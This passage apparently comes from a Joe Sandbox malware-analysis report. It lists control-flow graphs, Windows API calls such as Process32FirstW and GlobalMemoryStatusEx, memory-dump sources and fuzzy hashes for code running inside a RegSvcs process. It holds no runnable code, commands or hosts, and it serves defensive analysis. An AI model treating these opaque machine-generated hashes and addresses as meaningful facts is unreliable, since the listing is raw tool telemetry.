                                                                                                                • Instruction Fuzzy Hash: 26C1C131A002059FCB11EFB8D858AAEBBF6EF85314F148969D5069B391DF34DC45CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 05826BB0
                                                                                                                • GetCurrentThread.KERNEL32 ref: 05826BED
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,?,00000053), ref: 05826C2A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 05826C83
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 0fea6b059acae4978f775376986bef66be70abae616a5a565af66899d7e62978
                                                                                                                • Instruction ID: 443a71dac94f6072ad067fea4f98a11c272020aaf556e7be45a3cf3f0c5af54f
                                                                                                                • Opcode Fuzzy Hash: 0fea6b059acae4978f775376986bef66be70abae616a5a565af66899d7e62978
                                                                                                                • Instruction Fuzzy Hash: 0C5146B09012498FDB14CFA9D549BDEBFF4EF88314F24845AE909A7390DB745988CF62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 05826BB0
                                                                                                                • GetCurrentThread.KERNEL32 ref: 05826BED
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,?,00000053), ref: 05826C2A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 05826C83
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 1b73da6df46af8fa7e593c42a07a558204c53e1dc9500262050f477405b96903
                                                                                                                • Instruction ID: a8d4dd2f08c1bb9e30d27e30fdc42c47c15ed85f3b56964f1dfd158273287ad1
                                                                                                                • Opcode Fuzzy Hash: 1b73da6df46af8fa7e593c42a07a558204c53e1dc9500262050f477405b96903
                                                                                                                • Instruction Fuzzy Hash: 8B5125B09006498FDB14CFAAD549BDEBBF4FF88314F248469E909A7350DB746888CF65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 583 15fede0-15fedff 584 15fee24-15feeb2 583->584 585 15fee01-15fee0b 583->585 599 15feee5-15fef0e 584->599 600 15feeb4-15feec8 584->600 586 15fee0d-15fee1e 585->586 587 15fee20-15fee23 585->587 586->587 609 15fef41-15fef7a 599->609 610 15fef10-15fef24 599->610 606 15feecf 600->606 608 15feed6-15feede 606->608 608->599 613 15ff141-15ff15f 609->613 614 15fef80-15fef88 call 15ff2f5 609->614 619 15fef2b 610->619 618 15ff160 613->618 617 15fef8e-15fefa5 614->617 623 15fefac 617->623 618->618 621 15fef32-15fef3a 619->621 621->609 624 15fefb3-15fefd4 623->624 628 15ff0fa-15ff11e 624->628 629 15fefda-15ff03b 624->629 633 15ff129-15ff12a 628->633 634 15ff120 628->634 644 15ff0e9-15ff0f4 629->644 645 15ff041-15ff053 629->645 633->613 634->633 644->628 644->629 649 15ff059-15ff067 Process32FirstW 645->649 650 15ff071-15ff075 649->650 651 15ff07f-15ff08e BasepProcessInvalidImage 650->651 652 15ff098-15ff09c 651->652 653 15ff09e-15ff0a4 652->653 654 15ff0b6 652->654 655 15ff0a8-15ff0b4 653->655 656 15ff0a6 653->656 657 15ff0bc-15ff0cd 654->657 655->654 656->654 660 15ff0d6 657->660 660->644
                                                                                                                APIs
                                                                                                                • Process32FirstW.KERNEL32 ref: 015FF05D
                                                                                                                • BasepProcessInvalidImage.KERNEL32 ref: 015FF083
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.554783262.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_15f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BasepFirstImageInvalidProcessProcess32
                                                                                                                • String ID:
                                                                                                                • API String ID: 4138096214-0
                                                                                                                • Opcode ID: eb85379c5f6e6375b305d72196830d033153676f0b80256a1f6f0aab63a0baab
                                                                                                                • Instruction ID: 7cbd07b5196b256cea1da293335b2cb145be6b805d807d86245bf9b756c26dc4
                                                                                                                • Opcode Fuzzy Hash: eb85379c5f6e6375b305d72196830d033153676f0b80256a1f6f0aab63a0baab
                                                                                                                • Instruction Fuzzy Hash: 83816031B002049FDB14ABB8DC687AE7BE6AFC9344F248529D906DB794EF74DC068791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 662 15fee40-15feeb2 671 15feee5-15fef0e 662->671 672 15feeb4-15feecf 662->672 681 15fef41-15fef7a 671->681 682 15fef10-15fef2b 671->682 680 15feed6-15feede 672->680 680->671 685 15ff141-15ff15f 681->685 686 15fef80-15fefd4 call 15ff2f5 681->686 693 15fef32-15fef3a 682->693 690 15ff160 685->690 700 15ff0fa-15ff11e 686->700 701 15fefda-15ff03b 686->701 690->690 693->681 705 15ff129-15ff12a 700->705 706 15ff120 700->706 716 15ff0e9-15ff0f4 701->716 717 15ff041-15ff09c Process32FirstW BasepProcessInvalidImage 701->717 705->685 706->705 716->700 716->701 725 15ff09e-15ff0a4 717->725 726 15ff0b6-15ff0cd 717->726 727 15ff0a8-15ff0b4 725->727 728 15ff0a6 725->728 732 15ff0d6 726->732 727->726 728->726 732->716
                                                                                                                APIs
                                                                                                                • Process32FirstW.KERNEL32 ref: 015FF05D
                                                                                                                • BasepProcessInvalidImage.KERNEL32 ref: 015FF083
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.554783262.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_15f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BasepFirstImageInvalidProcessProcess32
                                                                                                                • String ID:
                                                                                                                • API String ID: 4138096214-0
                                                                                                                • Opcode ID: 6fdad9c3ef461abd81d9fde3a2ab6414073943650e993e8453c4a8f60fe4453c
                                                                                                                • Instruction ID: 6d1d076421b4cf86336f2c49bcb4942226bab44110416087b42cdf4b1e0a94cb
                                                                                                                • Opcode Fuzzy Hash: 6fdad9c3ef461abd81d9fde3a2ab6414073943650e993e8453c4a8f60fe4453c
                                                                                                                • Instruction Fuzzy Hash: 1A716131B002149FDB14ABB8DC647BE7AE7AFC8344F249529D906EB784EF749C068791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1318 15ff12c-15ff13b 1320 15ff141-15ff15f 1318->1320 1321 15fef80-15fefd4 call 15ff2f5 1318->1321 1324 15ff160 1320->1324 1332 15ff0fa-15ff11e 1321->1332 1333 15fefda-15ff03b 1321->1333 1324->1324 1337 15ff129-15ff12a 1332->1337 1338 15ff120 1332->1338 1348 15ff0e9-15ff0f4 1333->1348 1349 15ff041-15ff09c Process32FirstW BasepProcessInvalidImage 1333->1349 1337->1320 1338->1337 1348->1332 1348->1333 1357 15ff09e-15ff0a4 1349->1357 1358 15ff0b6-15ff0cd 1349->1358 1359 15ff0a8-15ff0b4 1357->1359 1360 15ff0a6 1357->1360 1364 15ff0d6 1358->1364 1359->1358 1360->1358 1364->1348
                                                                                                                APIs
                                                                                                                • Process32FirstW.KERNEL32 ref: 015FF05D
                                                                                                                • BasepProcessInvalidImage.KERNEL32 ref: 015FF083
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.554783262.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_15f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BasepFirstImageInvalidProcessProcess32
                                                                                                                • String ID:
                                                                                                                • API String ID: 4138096214-0
                                                                                                                • Opcode ID: 88fc1ed56e666c3d68967867600e2f7448119abfc9542d2ae81a2c93bd5069e7
                                                                                                                • Instruction ID: d334aeeb9ba9bc879af6c551b00193c794b799ced6088e941dd13feac8868b98
                                                                                                                • Opcode Fuzzy Hash: 88fc1ed56e666c3d68967867600e2f7448119abfc9542d2ae81a2c93bd5069e7
                                                                                                                • Instruction Fuzzy Hash: B7416231B002159FDB14ABB8DC68B7E7AEAAF88710F248529D906DB784DF748C418B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1770 17f9c78-17f9cc4 LdrInitializeThunk 1774 17f9ccb-17f9cd7 1770->1774 1775 17f9cdd-17f9ce6 1774->1775 1776 17f9ed8-17f9eeb 1774->1776 1778 17f9f0d 1775->1778 1779 17f9cec-17f9d01 1775->1779 1777 17f9f12-17f9f16 1776->1777 1780 17f9f18 1777->1780 1781 17f9f21 1777->1781 1778->1777 1783 17f9d1b-17f9d36 1779->1783 1784 17f9d03-17f9d16 1779->1784 1780->1781 1785 17f9f22 1781->1785 1793 17f9d38-17f9d42 1783->1793 1794 17f9d44 1783->1794 1786 17f9eac-17f9eb0 1784->1786 1785->1785 1788 17f9ebb-17f9ebc 1786->1788 1789 17f9eb2 1786->1789 1788->1776 1789->1788 1795 17f9d49-17f9d4b 1793->1795 1794->1795 1796 17f9d4d-17f9d60 1795->1796 1797 17f9d65-17f9dfe 1795->1797 1796->1786 1815 17f9e0c 1797->1815 1816 17f9e00-17f9e0a 1797->1816 1817 17f9e11-17f9e13 1815->1817 1816->1817 1818 17f9e56-17f9eaa 1817->1818 1819 17f9e15-17f9e17 1817->1819 1818->1786 1820 17f9e19-17f9e23 1819->1820 1821 17f9e25 1819->1821 1823 17f9e2a-17f9e2c 1820->1823 1821->1823 1823->1818 1824 17f9e2e-17f9e54 1823->1824 1824->1818
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555753346.00000000017F0000.00000040.00000010.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_17f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4bef354da34f9097aeb429ab976906142229d64ab6352ef21b002e95b39abbaf
                                                                                                                • Instruction ID: 87c970edafc83c5151a3b27b9464e3b610427851aedbbc847eddb4c8ae9420af
                                                                                                                • Opcode Fuzzy Hash: 4bef354da34f9097aeb429ab976906142229d64ab6352ef21b002e95b39abbaf
                                                                                                                • Instruction Fuzzy Hash: 60611C71A00219DBDB14EFB5D8587AEBBF6AF88309F10892CE606A7394DF359C45CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1835 5829fb0-5829fcf 1837 5829fd1-5829fdb 1835->1837 1838 5829ff4-582a01f 1835->1838 1839 5829ff0-5829ff3 1837->1839 1840 5829fdd-5829fee call 5821b18 1837->1840 1845 582a021-582a02b 1838->1845 1846 582a044-582a06f 1838->1846 1840->1839 1847 582a040-582a043 1845->1847 1848 582a02d-582a03e call 5821b18 1845->1848 1851 582a071-582a085 1846->1851 1852 582a088-582a08c 1846->1852 1848->1847 1851->1852 1854 582a0a5-582a0a9 1852->1854 1855 582a08e-582a0a2 1852->1855 1857 582a0c2-582a0c4 1854->1857 1858 582a0ab-582a0bf 1854->1858 1855->1854 1859 582a0c6-582a0dc 1857->1859 1860 582a0de-582a0ec 1857->1860 1858->1857 1866 582a0f4-582a104 1859->1866 1860->1866 1868 582a106-582a110 1866->1868 1869 582a12a-582a137 1866->1869 1868->1869 1874 582a112-582a120 1868->1874 1872 582a16b-582a17e SetFileCompletionNotificationModes 1869->1872 1873 582a139-582a152 1869->1873 1875 582a184-582a189 1872->1875 1873->1872 1878 582a154-582a169 1873->1878 1880 582a122 call 582a9b8 1874->1880 1881 582a122 call 582a9a9 1874->1881 1876 582a128 1876->1875 1878->1875 1880->1876 1881->1876
                                                                                                                APIs
                                                                                                                • SetFileCompletionNotificationModes.KERNEL32(?,00000000,00000000,00000000,?), ref: 0582A17E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompletionFileModesNotification
                                                                                                                • String ID:
                                                                                                                • API String ID: 624319709-0
                                                                                                                • Opcode ID: 9ac5268c8ce9634af7c328f248a2c46ed14f2cafa4464bce1788754deea5a0e2
                                                                                                                • Instruction ID: f97a9e1c1239c6d2ab79b5d1986209443e20c9775d1ff6b254a0378543d04fbf
                                                                                                                • Opcode Fuzzy Hash: 9ac5268c8ce9634af7c328f248a2c46ed14f2cafa4464bce1788754deea5a0e2
                                                                                                                • Instruction Fuzzy Hash: 5B519D317042099FDB05AF65D848A6A7FB6FF88314F408065EE06CB391DB79DC56CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1882 17fe928-17fe933 1883 17fe95d-17fe97c call 17f9380 1882->1883 1884 17fe935-17fe95c call 17f9374 1882->1884 1890 17fe97e-17fe981 1883->1890 1891 17fe982-17fe9b9 1883->1891 1896 17fe9bb-17fe9c1 1891->1896 1897 17fea19-17fea1f 1891->1897 1898 17fea21-17fea74 GlobalMemoryStatusEx 1896->1898 1899 17fe9c3-17fe9e1 1896->1899 1897->1898 1902 17fea7d-17feaa5 1898->1902 1903 17fea76-17fea7c 1898->1903 1907 17fe9e7-17fea18 1899->1907 1908 17fe9e3-17fe9e6 1899->1908 1903->1902 1907->1897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555753346.00000000017F0000.00000040.00000010.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_17f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60ec2b582dfdc7f9705c27dc0c3faf16cc272c3514eb1477e261e26d6f247e6e
                                                                                                                • Instruction ID: 87e6ee53e0558f7c35daa862c12bd58ca51a544bdd059ef5a6d65862c1c582b7
                                                                                                                • Opcode Fuzzy Hash: 60ec2b582dfdc7f9705c27dc0c3faf16cc272c3514eb1477e261e26d6f247e6e
                                                                                                                • Instruction Fuzzy Hash: CB414372E047458FCB10DFA9C8042EEFBF5EF86224F09856AD645A7351EB349845CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1910 5825184-58251f6 1912 5825201-5825208 1910->1912 1913 58251f8-58251fe 1910->1913 1914 5825213-582524b 1912->1914 1915 582520a-5825210 1912->1915 1913->1912 1916 5825253-58252b2 CreateWindowExW 1914->1916 1915->1914 1917 58252b4-58252ba 1916->1917 1918 58252bb-58252f3 1916->1918 1917->1918 1922 5825300 1918->1922 1923 58252f5-58252f8 1918->1923 1924 5825301 1922->1924 1923->1922 1924->1924
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058252A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: fbf4c9046c6df94c0f6807fc1cce0b31bac53f9a33aa8a5c88b8eb12af44322f
                                                                                                                • Instruction ID: 2ed974993fe67a64bf41d9338e5b3c0f8e0b5ed56e68f18573d00119670d233e
                                                                                                                • Opcode Fuzzy Hash: fbf4c9046c6df94c0f6807fc1cce0b31bac53f9a33aa8a5c88b8eb12af44322f
                                                                                                                • Instruction Fuzzy Hash: 8D51CFB1D002199FDB14CF9AC884ADEBFF5FF48314F64852AE819AB250D774A885CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058252A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: d66e030098882ba9601de7ea1a102c0899f55f96c77c38a38cacdd6b87f9596e
                                                                                                                • Instruction ID: e77fd708cb03944894de0f9ad8f9c20e7d3c15617408a3652e32235a8ef29090
                                                                                                                • Opcode Fuzzy Hash: d66e030098882ba9601de7ea1a102c0899f55f96c77c38a38cacdd6b87f9596e
                                                                                                                • Instruction Fuzzy Hash: 1041CFB1D103199FDB14CF99C884ADEBFB5FF48314F64852AE819AB250D774A885CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555753346.00000000017F0000.00000040.00000010.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_17f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9671478c526be9131b74c53d8232a04cc80100c69e59702abd99b98706d99ad0
                                                                                                                • Instruction ID: d0173cc09fc3cb1ea028f5887902fc7417aa507d26a8a60a3e26934fec292984
                                                                                                                • Opcode Fuzzy Hash: 9671478c526be9131b74c53d8232a04cc80100c69e59702abd99b98706d99ad0
                                                                                                                • Instruction Fuzzy Hash: 0C417B30A44345CFDB15DF78C858AAABBB5AF89308F1484B9E6049B392DB39DC49CB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05827D01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: a0951958058570d33be566419fd91cb12f805598334f14ec6c5da61a4bd2f701
                                                                                                                • Instruction ID: 02e579c99ad64918d532356abd0cd7eef2ee9c240463a47e25c16fcf6a2a2ae9
                                                                                                                • Opcode Fuzzy Hash: a0951958058570d33be566419fd91cb12f805598334f14ec6c5da61a4bd2f701
                                                                                                                • Instruction Fuzzy Hash: FB411DB5A002158FDB14CF99C448AAABBF9FF88314F148459D919A7325D774AC45CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05826DFF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 72928b3a144022796c073a936592bdb403e328777be5c2440fcc6575eaf55a76
                                                                                                                • Instruction ID: e63d81f302d19414b4382a5529de3998c4e98691c477cff5a427f3f5864c05bd
                                                                                                                • Opcode Fuzzy Hash: 72928b3a144022796c073a936592bdb403e328777be5c2440fcc6575eaf55a76
                                                                                                                • Instruction Fuzzy Hash: E321E3B59002189FDB10CFEAD484ADEBBF8FB48324F24842AE914A3350D774A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05826DFF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 1b000c45f4a3f42005f61fad6ec1f931ae97af1e60084db8c345c4e3f8994e47
                                                                                                                • Instruction ID: bf38a0805aac4471970d6290e9ea2b72a672283864412a81e5ce6ef3b7cf78f3
                                                                                                                • Opcode Fuzzy Hash: 1b000c45f4a3f42005f61fad6ec1f931ae97af1e60084db8c345c4e3f8994e47
                                                                                                                • Instruction Fuzzy Hash: 2821E4B59002189FDB10CFAAD484ADEBBF8FB48324F14841AE914B3310D774A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0582BE72
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2118026453-0
                                                                                                                • Opcode ID: 105cca0d943505ed49ab8756e05e0ff1a15b2b0e911dfa130d78da179189f77e
                                                                                                                • Instruction ID: 57c1608ba58c5df12c664ff823a5782d55c5521c666c2ada41de900d0587ae0e
                                                                                                                • Opcode Fuzzy Hash: 105cca0d943505ed49ab8756e05e0ff1a15b2b0e911dfa130d78da179189f77e
                                                                                                                • Instruction Fuzzy Hash: AF218C76902305CFCB10DFA9D50979EBFF8FB08325F14882AD949A7601C7386984CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,017FE97A), ref: 017FEA67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555753346.00000000017F0000.00000040.00000010.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_17f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: c184badd0498f263a9c57d5198018598d12ebe626d63ee4a2d87c480b9e2750a
                                                                                                                • Instruction ID: 446251aeb640556f310a4a9f15edd719ae370f5858fbe3d0ae783b19aea7cbb3
                                                                                                                • Opcode Fuzzy Hash: c184badd0498f263a9c57d5198018598d12ebe626d63ee4a2d87c480b9e2750a
                                                                                                                • Instruction Fuzzy Hash: B21122B1C006199BCB10CFAAC444BEEFBF4FB48220F15852AD518B7240D778AA44CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0582BE72
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2118026453-0
                                                                                                                • Opcode ID: 50d0ea1ce21fad18579d34f00b6c3e7e5d7f64b4a210bbda9d39ec9a9da8e5ee
                                                                                                                • Instruction ID: 05549afb09c84d020c9e12527cf0724faf9cea2f1135b73309e218b929ffa790
                                                                                                                • Opcode Fuzzy Hash: 50d0ea1ce21fad18579d34f00b6c3e7e5d7f64b4a210bbda9d39ec9a9da8e5ee
                                                                                                                • Instruction Fuzzy Hash: 88118C759013058FCB10DFA9C40879EBFF8FB04324F24842AD949A7600C7386984CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,017FE97A), ref: 017FEA67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.555753346.00000000017F0000.00000040.00000010.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_17f0000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 61c9b7eb055cc920288adafe9a7437c34c65ef85f3eb3dbd9296d0dc14054191
                                                                                                                • Instruction ID: babbcf125b2c36eac69b1d796ace9a6ddae8dbcded0f1248caeac2dfd9ca958a
                                                                                                                • Opcode Fuzzy Hash: 61c9b7eb055cc920288adafe9a7437c34c65ef85f3eb3dbd9296d0dc14054191
                                                                                                                • Instruction Fuzzy Hash: B61103B6C006198FCB10CF99D545BEEFBF4BF48224F15852AD518B7250E778A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 05824216
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 794c67c53a8bff808d843216b1e9acafd65efc5c3741a3f54863276271e5ad46
                                                                                                                • Instruction ID: ad6414af7eb4340aa36567f54580adb1e570a7b14febd47af4cdf24d860ba9fb
                                                                                                                • Opcode Fuzzy Hash: 794c67c53a8bff808d843216b1e9acafd65efc5c3741a3f54863276271e5ad46
                                                                                                                • Instruction Fuzzy Hash: AB1132B5C002498FCB20CF9AD444BDEFBF8FB88224F15842AD929B7210C374A945CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 05824216
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.557640447.0000000005820000.00000040.00000001.sdmp, Offset: 05820000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_5820000_RegSvcs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: e5d1d5f3d3328bffd4826e507731813b5ef470a102ca8517bc6c2a96fc1ec6c1
                                                                                                                • Instruction ID: 636d964fa80662ce894a2455883cb635ff453b445716cfb26773d7223bc9d5a8
                                                                                                                • Opcode Fuzzy Hash: e5d1d5f3d3328bffd4826e507731813b5ef470a102ca8517bc6c2a96fc1ec6c1
